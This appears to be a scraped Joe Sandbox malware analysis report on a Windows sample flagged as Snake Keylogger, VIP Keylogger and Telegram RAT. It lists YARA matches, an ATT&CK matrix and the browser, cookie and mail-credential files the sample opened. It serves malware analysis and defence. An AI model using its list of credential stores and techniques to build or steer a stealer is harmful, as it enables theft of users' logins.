Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 5404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 7164, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 5404, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3342384845.0000000000439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 5404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 7164, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 5404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 7164, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.HgKRLOctZksk.exe.3c45e40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 5404, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZTEIhNCtP3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
ZTEIhNCtP3.exe